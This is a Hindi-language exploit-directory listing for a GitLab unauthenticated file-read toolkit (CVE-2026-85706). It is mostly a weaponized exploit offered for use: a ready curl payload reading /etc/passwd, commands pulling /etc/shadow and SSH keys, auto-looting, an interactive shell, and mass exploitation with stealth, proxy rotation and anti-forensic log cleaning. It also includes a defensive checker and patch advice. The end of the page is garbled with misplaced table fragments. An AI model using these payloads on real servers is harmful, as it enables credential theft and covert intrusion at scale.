Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-85706-PoC-Toolkit — CVE-2026-85706 GitLab अनधिकृत फ़ाइल पढ़ने के लिए Python टूलकिट: loot, shell, mass scan के साथ weaponized exploit, साथ ही non-intrusive SafeChecker ऑडिट और रिपोर्टिंग। | Kitploit
उपकरण/GitHubGitHub/tc4dy/cve-2026-85706-poc-toolkit
रक्षात्मक उपकरणभेद्यता स्कैनरभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापोस्ट-शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंग

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
रेड टीमिंग
GitHubtc4dy/cve-2026-85706-poc-toolkit

CVE-2026-85706-PoC-Toolkit

CVE-2026-85706 GitLab अनधिकृत फ़ाइल पढ़ने के लिए Python टूलकिट: loot, shell, mass scan के साथ weaponized exploit, साथ ही non-intrusive SafeChecker ऑडिट और रिपोर्टिंग।

रिपॉजिटरी देखेंवेबसाइट
110घं 19मि पहलेअभी तक समीक्षित नहीं
साझा करें

CVEPoC

CVE‑2026‑85706 – GitLab अनधिकृत फ़ाइल पठन टूलकिट

Python 3.8+ CVSS Author GitLab

⚠️ केवल नैतिक उपयोग हेतु – अधिकृत सुरक्षा परीक्षण
यह रिपॉज़िटरी केवल अधिकृत सुरक्षा पेशेवरों, ब्लू टीमों और पेनेट्रेशन टेस्टरों के लिए उपकरण प्रदान करती है।
कंप्यूटर सिस्टम तक अनधिकृत पहुँच CFAA (US), Computer Misuse Act (UK), TCK 243/244 (Turkey), और दुनिया भर के समान कानूनों के तहत अवैध है।


📖 भेद्यता अवलोकन

CVE‑2026‑85706 स्व-प्रबंधित GitLab CE/EE (संस्करण 18.7 से तक) में एक गंभीर भेद्यता है, जो एक अनधिकृत हमलावर को commits API पर एक ही HTTP अनुरोध के माध्यम से सर्वर पर किसी भी फ़ाइल को पढ़ने की अनुमति देती है।

19.3.1
अनधिकृत मनमाना स्थानीय फ़ाइल पठन

यह कैसे काम करता है

  1. Workhorse बनाम Puma पार्सिंग बेमेल – GitLab Workhorse अनुरोध पथ को प्रतिशत-डिकोडिंग से पहले मान्य करता है, जबकि Puma/Rails इसे बाद में डिकोड करता है। यह %63ommits जैसे एन्कोडेड अक्षरों का उपयोग करके Workhorse की सुरक्षा जाँचों को बायपास करने की अनुमति देता है।
  2. प्री-ऑथ फ़ाइल खोलना – /api/v4/projects/{id}/repository/commits एंडपॉइंट प्रमाणीकरण लागू होने से पहले file.path में निर्दिष्ट फ़ाइल को खोलता है।
  3. त्रुटि के माध्यम से सामग्री प्रतिध्वनि – यदि फ़ाइल में अमान्य %-sequence है, तो Rack 400 Bad Request बॉडी में सामग्री को प्रतिध्वनित करता है, जिससे पूरी सामग्री लीक हो जाती है।
  4. प्रभाव – रहस्य, टोकन, SSH कुंजियाँ, CI/CD वेरिएबल, डेटाबेस क्रेडेंशियल, और GitLab अवसंरचना में पार्श्व गति। तुरंत अपग्रेड करें!

प्रभावित संस्करण

  • 18.7.0 – 19.1.7 – भेद्य
  • 19.2.0 – 19.2.5 – भेद्य
  • 19.3.0 – 19.3.1 – भेद्य

पैच

  • 19.1.8, 19.2.6, या 19.3.2 या नए संस्करण में अपग्रेड करें।
  • यदि अपग्रेड संभव नहीं है, तो GitLab तक नेटवर्क पहुँच प्रतिबंधित करें (इसे कभी इंटरनेट पर उजागर न करें) और अस्थायी उपाय के रूप में सभी टोकन/रहस्य रोटेट करें।

🧰 उपकरण

उपकरणउद्देश्यइच्छित उपयोगकर्ता
exploit.pyअनधिकृत फ़ाइल पठन, लूट गणना, एडमिन टोकन निष्कर्षण, मास स्कैनिंग, इंटरैक्टिव शेल, प्रॉक्सी रोटेशन, स्टेल्थ मोड, और बहु-प्रारूप रिपोर्टिंग के साथ पूर्ण हथियारीकृत टूलकिट।रेड टीमें / अधिकृत पेंटेस्टर
safechecker.pyगैर-घुसपैठी भेद्यता जाँचकर्ता जो GitLab संस्करण का पता लगाता है, एक्सपोज़र को मान्य करता है, सुरक्षा हेडर का ऑडिट करता है, और किसी भी फ़ाइल को पढ़े बिना जोखिम का आकलन करता है। JSON/CSV/HTML रिपोर्ट उत्पन्न करता है।ब्लू टीमें / सुरक्षा ऑडिटर

📊 विशेषता तुलना

विशेषताexploit.pysafechecker.py
भेद्यता पहचान✅✅
संस्करण पहचान✅✅
अनधिकृत फ़ाइल पठन✅❌
लूट गणना✅❌
एडमिन टोकन निष्कर्षण✅❌
इंटरैक्टिव शेल✅❌
मास स्कैनिंग (मल्टी-थ्रेड)✅✅
सुरक्षा हेडर ऑडिट❌✅
TLS/प्रमाणपत्र जाँच❌✅
MITRE ATT&CK मैपिंग✅✅
प्रॉक्सी समर्थन✅✅
प्रॉक्सी रोटेशन✅❌
User‑Agent रोटेशन (OPSEC)✅❌
जिटर / विलंब (OPSEC)✅❌
अनुकूली दर सीमक✅✅
स्टेल्थ मोड✅❌
curl_cffi TLS प्रतिरूपण✅❌
गैर-घुसपैठी (सुरक्षित) मोड❌✅
JSON / JSONL / CSV / HTML आउटपुट✅✅
SQLite DB आउटपुट✅❌
Webhook अधिसूचना✅✅
पिछले स्कैन के विरुद्ध अंतर✅✅
लॉग सफ़ाई (एंटी-फ़ोरेंसिक)✅❌

🎯 उपयोग केस सारांश

परिदृश्यअनुशंसित उपकरण
ब्लू टीम – जाँचें कि आपका GitLab भेद्य है या नहींsafechecker.py
सुरक्षा ऑडिट – गैर-घुसपैठी भेद्यता मूल्यांकनsafechecker.py
रेड टीम – पूर्ण शोषण के साथ अधिकृत पेनेट्रेशन परीक्षणexploit.py
बग बाउंटी – जिम्मेदार प्रकटीकरण परीक्षणsafechecker.py
मास स्कैनिंग – भेद्यता के लिए कई लक्ष्यों की जाँचexploit.py (केवल-पहचान)
घटना प्रतिक्रिया – जाँचें कि सिस्टम से समझौता हुआ है या नहींsafechecker.py

⚙️ स्थापना

root@kitploit:~
git clone https://github.com/tc4dy/CVE-2026-85706-PoC-Toolkit
cd CVE-2026-85706-PoC-Toolkit
pip install -r requirements.txt

requirements.txt

root@kitploit:~
requests
urllib3
curl_cffi
rich
pyyaml

📋 पैरामीटर

exploit.py पैरामीटर

पैरामीटरविवरण
-u, --urlएकल लक्ष्य URL (जैसे https://gitlab.example.com)
-f, --fileलक्ष्यों की सूची वाली फ़ाइल (प्रति पंक्ति एक)
--pipestdin से लक्ष्य पढ़ें (subfinder/httpx पाइपलाइन)
--readपढ़ने के लिए पूर्ण पथ, अल्पविराम से अलग
--wordlistपढ़ने के लिए पथों वाली फ़ाइल (प्रति पंक्ति एक)
--project-idएक विशिष्ट प्रोजेक्ट ID बाध्य करें
--max-projectsआज़माने के लिए अधिकतम प्रोजेक्ट ID (डिफ़ॉल्ट: 8)
--autoउच्च-मूल्य GitLab फ़ाइलों को स्वचालित रूप से लूटें
--loot--auto के समान
--shellशोषण के बाद इंटरैक्टिव शेल
--forceGitLab फ़िंगरप्रिंट कमज़ोर होने पर भी स्कैन करें
-t, --threadsमल्टी-टार्गेट के लिए थ्रेड (डिफ़ॉल्ट: 8)
--timeoutHTTP टाइमआउट (डिफ़ॉल्ट: 15s)
--retryपुनः प्रयास गणना (डिफ़ॉल्ट: 3)
--retry-onपुनः प्रयास के लिए HTTP कोड (डिफ़ॉल्ट: 429,500,502,503,504)
--proxyHTTP/HTTPS प्रॉक्सी
--proxy-listरोटेशन के लिए प्रॉक्सी वाली फ़ाइल
--proxy-rotateरोटेशन रणनीति: round-robin, random, sticky
--jitterअनुरोधों के बीच यादृच्छिक जिटर जोड़ें
--jitter-rangeजिटर न्यूनतम,अधिकतम सेकंड (डिफ़ॉल्ट: 0.1,2.0)
--delayअनुरोधों के बीच निश्चित विलंब
--stealthस्टेल्थ मोड सक्षम करें (UA रोटेशन + X-Forwarded-For)

safechecker.py पैरामीटर

पैरामीटरविवरण
-u, --urlएकल लक्ष्य URL (जैसे https://gitlab.example.com)
-f, --fileलक्ष्यों वाली फ़ाइल (प्रति पंक्ति एक)
-t, --threadsमल्टी-टार्गेट के लिए थ्रेड (डिफ़ॉल्ट: 5)
--timeoutHTTP टाइमआउट (डिफ़ॉल्ट: 10s)
--rate-limitप्रति सेकंड अधिकतम अनुरोध (0 = असीमित)
--user-agentकस्टम User-Agent स्ट्रिंग
--insecureTLS सत्यापन अक्षम करें (MITM जोखिम)
--webhookWebhook URL (slack:, discord:, telegram:)
--diffपिछले स्कैन JSON से तुलना करें
-v, --verboseविस्तृत आउटपुट
-o, --outputJSON आउटपुट फ़ाइल
--csvCSV आउटपुट फ़ाइल
--reportHTML रिपोर्ट फ़ाइल
--mitreMITRE ATT&CK मैपिंग शामिल करें (डिफ़ॉल्ट: चालू)

💥 परिदृश्य

#परिदृश्यकमांड
1त्वरित भेद्यता जाँचpython safechecker.py -u https://gitlab.example.com
2रिपोर्ट के साथ विस्तृत ऑडिटpython safechecker.py -u https://gitlab.example.com -o report.json --csv report.csv --report report.html -v
3फ़ाइल से मास ऑडिटpython safechecker.py -f targets.txt -t 10 --rate-limit 5
4केवल-पहचान शोषणpython exploit.py -u https://gitlab.example.com --safe-mode
5एकल फ़ाइल पढ़ेंpython exploit.py -u https://gitlab.example.com --read /etc/passwd
6कई फ़ाइलें पढ़ेंpython exploit.py -u https://gitlab.example.com --read /etc/passwd,/etc/shadow,/root/.ssh/id_rsa
7उच्च-मूल्य फ़ाइलों को स्वतः लूटेंpython exploit.py -u https://gitlab.example.com --auto
8इंटरैक्टिव शेलpython exploit.py -u https://gitlab.example.com --shell
9स्टेल्थ के साथ मास शोषणpython exploit.py -f targets.txt -t 20 --stealth --jitter --auto -o hits.jsonl --output-format jsonl
10subfinder से पाइपलाइनsubfinder -d example.com -silent | httpx -silent -sc | python exploit.py --pipe --auto -o hits.jsonl
11SIEM आउटपुट के साथ पूर्ण हमलाpython exploit.py -u https://gitlab.example.com --auto --grep "password|secret|token" --mitre --json-schema -o siem.json
12बाधित स्कैन फिर से शुरू करेंpython exploit.py -f targets.txt --auto --resume state.json
13दो स्कैन की तुलना करेंpython safechecker.py -f targets.txt -o new.json --diff previous.json

🧪 एंडपॉइंट और शोषण श्रृंखला

एक्सप्लॉइट निम्नलिखित GitLab एंडपॉइंट और बायपास तकनीकों का उपयोग करता है:

चरणविधिएंडपॉइंटविवरण
1. बायपासPOST/api/v4/projects/{id}/repository/%63ommitsएन्कोडेड c Workhorse को बायपास करता है
2. बायपासPOST/api/v4/projects/{id}/%72epository/commitsrepository में एन्कोडेड r
3. बायपासPOST/api/v4/projects/{id}/repository/commits/ट्रेलिंग स्लैश बायपास
4. बायपासPOST/api/v4/projects/{id}/repository/commits.jsonGrape प्रारूप प्रत्यय बायपास
5. Files APIPOST/api/v4/projects/{id}/repository/files/xवैकल्पिक मार्ग

पेलोड प्रारूप

root@kitploit:~
file=&file.path=/etc/passwd&file.size=1

तैयार curl

root@kitploit:~
curl -sk -X POST "https://gitlab.example.com/api/v4/projects/1/repository/%63ommits?file=&file.path=/etc/passwd&file.size=1&Content-Type=application/x-www-form-urlencoded"

🛡️ जिम्मेदार उपयोग

  • इन उपकरणों का उपयोग केवल उन सिस्टम पर करें जिनके आप स्वामी हैं या जिनका परीक्षण करने के लिए आपके पास स्पष्ट लिखित अनुमति है।
  • अनधिकृत पहुँच अवैध और अनैतिक है।
  • लेखक किसी भी दुरुपयोग के लिए जिम्मेदार नहीं हैं।
  • हमेशा अपने देश के कानूनों और विनियमों का पालन करें।

यह सॉफ़्टवेयर केवल शैक्षिक उद्देश्यों और अधिकृत सुरक्षा परीक्षण के लिए प्रदान किया गया है।

टूल डाउनलोड करें
कस्टम User‑Agent
✅
✅
SSL सत्यापन नियंत्रण✅✅
--curl-cffiTLS फ़िंगरप्रिंट प्रतिरूपण के लिए curl_cffi का उपयोग करें
--user-agent-fileUser-Agent स्ट्रिंग्स वाली फ़ाइल
--max-bodyअधिकतम प्रतिक्रिया बॉडी आकार (0 = असीमित)
--concurrent-per-hostप्रति होस्ट अधिकतम समवर्ती अनुरोध
--rate-limitप्रति सेकंड अधिकतम अनुरोध (0 = असीमित)
--excludeबहिष्कृत करने के लिए होस्ट, अल्पविराम से अलग (glob पैटर्न)
--grepकेवल regex से मेल खाने वाले लीक दिखाएँ
--resumeस्टेट फ़ाइल से फिर से शुरू करें
--notifyअधिसूचना URL (slack:, discord:, telegram:)
--dbपरिणाम SQLite डेटाबेस में सहेजें
--output-formatआउटपुट प्रारूप: json, jsonl, csv, html
-o, --outputआउटपुट फ़ाइल पथ
-v, --verboseविस्तृत आउटपुट
-q, --quietशांत मोड
--no-colorरंग अक्षम करें
--no-bannerबैनर नहीं
--configYAML/JSON कॉन्फ़िग फ़ाइल
--dry-runअनुरोध किए बिना योजना दिखाएँ
--safe-modeसत्यापन के लिए केवल /etc/hostname पढ़ें
--timeout-profileaggressive, normal, stealth
--mitreMITRE ATT&CK मैपिंग शामिल करें
--fingerprintविस्तृत GitLab फ़िंगरप्रिंट
--cve-checkसंबंधित CVE की जाँच करें
--json-schemaSIEM के लिए JSON स्कीमा के साथ आउटपुट
--progressप्रगति बार दिखाएँ (rich आवश्यक)